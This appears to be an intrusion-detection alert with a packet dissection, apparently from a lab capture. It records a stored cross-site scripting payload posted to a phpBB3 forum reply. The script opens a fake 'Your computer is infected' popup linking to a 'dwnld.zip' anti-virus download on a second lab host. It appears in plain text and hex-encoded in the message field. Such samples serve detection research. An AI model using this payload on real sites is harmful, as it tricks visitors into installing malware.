Culprit: webiotprimeq/inputprimehttp1314317942

Code: d1

SID: <script>my_window = window.open('', 'mywindow1', 'status=1,width=450,height=250');my_window.document.write('<h1>!!!Your computer is infected!!!</h1>');my_window.document.write('<h2>Click to <a href=http://192.168.147.130/dwnld.zip> download</a> your anti-virus now</h2>');</script>

PID: 

<script>my_window = window.open('', 'mywindow1', 'status=1,width=450,height=250');my_window.document.write('<h1>!!!Your computer is infected!!!</h1>');my_window.document.write('<h2>Click to <a href=http://192.168.147.130/dwnld.zip> download</a> your anti-virus now</h2>');</script>

Match: <script>my_window = window.open('', 'mywindow1', 'status=1,width=450,height=250');my_window.document.write('<h1>!!!Your computer is infected!!!</h1>');my_window.document.write('<h2>Click to <a href=http://192.168.147.130/dwnld.zip> download</a> your anti-virus now</h2>');</script>

Packet: <packet>
  <proto name="geninfo" pos="0" showname="General information" size="1239">
    <field name="num" pos="0" show="7521" showname="Number" value="1d61" size="1239"/>
    <field name="len" pos="0" show="1239" showname="Packet Length" value="4d7" size="1239"/>
    <field name="caplen" pos="0" show="1239" showname="Captured Length" value="4d7" size="1239"/>
    <field name="timestamp" pos="0" show="Aug 26, 2011 02:26:48.698897000" showname="Captured Time" value="1314318408.698897000" size="1239"/>
  </proto>
<proto name="http" showname="Hypertext Transfer Protocol" size="770" pos="0">
    <field name="" show="POST /phpbb3/posting.php?mode=reply&amp;f=2&amp;sid=95680d56ce052fafafb7997399bc4c2e&amp;t=600 HTTP/1.1\r\n" size="93" pos="0" value="504f5354202f7068706262332f706f7374696e672e7068703f6d6f64653d7265706c7926663d32267369643d393536383064353663653035326661666166623739393733393962633463326526743d36303020485454502f312e310d0a">
      <field name="http.request.method" showname="Request Method: POST" size="4" pos="0" show="POST" value="504f5354"/>
      <field name="http.request.uri" showname="Request URI: /phpbb3/posting.php?mode=reply&amp;f=2&amp;sid=95680d56ce052fafafb7997399bc4c2e&amp;t=600" size="77" pos="5" show="/phpbb3/posting.php?mode=reply&amp;f=2&amp;sid=95680d56ce052fafafb7997399bc4c2e&amp;t=600" value="2f7068706262332f706f7374696e672e7068703f6d6f64653d7265706c7926663d32267369643d393536383064353663653035326661666166623739393733393962633463326526743d363030"/>
      <field name="http.request.version" showname="Request Version: HTTP/1.1" size="8" pos="83" show="HTTP/1.1" value="485454502f312e31"/>
    </field>
    <field name="http.host" showname="Host: 192.168.147.128\r\n" size="23" pos="93" show="192.168.147.128" value="486f73743a203139322e3136382e3134372e3132380d0a"/>
    <field name="http.user_agent" showname="User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3\r\n" size="116" pos="116" show="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3" value="557365722d4167656e743a204d6f7a696c6c612f352e3020285831313b20553b204c696e757820693638363b20656e2d55533b2072763a312e392e302e3329204765636b6f2f32303038303932353130205562756e74752f382e303420286861726479292046697265666f782f332e302e330d0a"/>
    <field name="http.accept" showname="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" size="73" pos="232" show="text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" value="4163636570743a20746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c2a2f2a3b713d302e380d0a"/>
    <field name="http.accept_language" showname="Accept-Language: en-us,en;q=0.5\r\n" size="33" pos="305" show="en-us,en;q=0.5" value="4163636570742d4c616e67756167653a20656e2d75732c656e3b713d302e350d0a"/>
    <field name="http.accept_encoding" showname="Accept-Encoding: gzip,deflate\r\n" size="31" pos="338" show="gzip,deflate" value="4163636570742d456e636f64696e673a20677a69702c6465666c6174650d0a"/>
    <field name="" show="Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" size="48" pos="369" value="4163636570742d436861727365743a2049534f2d383835392d312c7574662d383b713d302e372c2a3b713d302e370d0a"/>
    <field name="" show="Keep-Alive: 300\r\n" size="17" pos="417" value="4b6565702d416c6976653a203330300d0a"/>
    <field name="http.connection" showname="Connection: keep-alive\r\n" size="24" pos="434" show="keep-alive" value="436f6e6e656374696f6e3a206b6565702d616c6976650d0a"/>
    <field name="http.referer" showname="Referer: http://192.168.147.128/phpbb3/posting.php?mode=reply&amp;f=2&amp;t=600\r\n" size="73" pos="458" show="http://192.168.147.128/phpbb3/posting.php?mode=reply&amp;f=2&amp;t=600" value="526566657265723a20687474703a2f2f3139322e3136382e3134372e3132382f7068706262332f706f7374696e672e7068703f6d6f64653d7265706c7926663d3226743d3630300d0a"/>
    <field name="http.cookie" showname="Cookie: phpbb3_ss2cb_u=53; phpbb3_ss2cb_k=; phpbb3_ss2cb_sid=95680d56ce052fafafb7997399bc4c2e; style_cookie=null\r\n" size="114" pos="531" show="phpbb3_ss2cb_u=53; phpbb3_ss2cb_k=; phpbb3_ss2cb_sid=95680d56ce052fafafb7997399bc4c2e; style_cookie=null" value="436f6f6b69653a207068706262335f73733263625f753d35333b207068706262335f73733263625f6b3d3b207068706262335f73733263625f7369643d39353638306435366365303532666166616662373939373339396263346332653b207374796c655f636f6f6b69653d6e756c6c0d0a"/>
    <field name="http.content_type" showname="Content-Type: multipart/form-data; boundary=---------------------------1129566413184803526412776091\r\n" size="101" pos="645" show="multipart/form-data; boundary=---------------------------1129566413184803526412776091" value="436f6e74656e742d547970653a206d756c7469706172742f666f726d2d646174613b20626f756e646172793d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d313132393536363431333138343830333532363431323737363039310d0a"/>
    <field name="http.content_length" showname="Content-Length: 1849" size="22" pos="746" show="1849" value="436f6e74656e742d4c656e6774683a20313834390d0a"/>
    <field name="" show="\r\n" size="2" pos="768" value="0d0a"/>
    <field name="http.request" showname="Request: True" hide="yes" size="0" pos="0" show="1"/>
  </proto>
<proto name="mime_multipart">
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2269636f6e220d0a0d0a"/>
<mimepartdata value="30"/>
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d227375626a656374220d0a0d0a"/>
<mimepartdata value="52653a2054657374546f706963"/>
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d226164646262636f64653230220d0a0d0a"/>
<mimepartdata value="313030"/>
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d226d657373616765220d0a0d0a"/>
<mimepartdata value="3c7363726970743e6d795f77696e646f77203d2077696e646f772e6f70656e2827272c20276d7977696e646f7731272c20277374617475733d312c77696474683d3435302c6865696768743d32353027293b6d795f77696e646f772e646f63756d656e742e777269746528273c68313e212121596f757220636f6d707574657220697320696e6665637465642121213c2f68313e27293b6d795f77696e646f772e646f63756d656e742e777269746528273c68323e436c69636b20746f203c6120687265663d687474703a2f2f3139322e3136382e3134372e3133302f64776e6c642e7a69703e20646f776e6c6f61643c2f613e20796f757220616e74692d7669727573206e6f773c2f68323e27293b3c2f7363726970743e"/>
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d22746f7069635f6375725f706f73745f6964220d0a0d0a"/>
<mimepartdata value="34333030"/>
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d226c617374636c69636b220d0a0d0a"/>
<mimepartdata value="31333134333138343030"/>
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2270726576696577220d0a0d0a"/>
<mimepartdata value="50726576696577"/>
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d226174746163685f736967220d0a0d0a"/>
<mimepartdata value="6f6e"/>
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d226372656174696f6e5f74696d65220d0a0d0a"/>
<mimepartdata value="31333134333138343030"/>
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d22666f726d5f746f6b656e220d0a0d0a"/>
<mimepartdata value="33333839346333363933663233323434356430353762353361396333333462646134633338613233"/>
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2266696c6575706c6f6164223b2066696c656e616d653d22220d0a436f6e74656e742d547970653a206170706c69636174696f6e2f6f637465742d73747265616d0d0a0d0a"/>
<mimepartdata value=""/>
<mimeparthdr value="436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2266696c65636f6d6d656e74220d0a0d0a"/>
<mimepartdata value=""/>
</proto>
</packet>



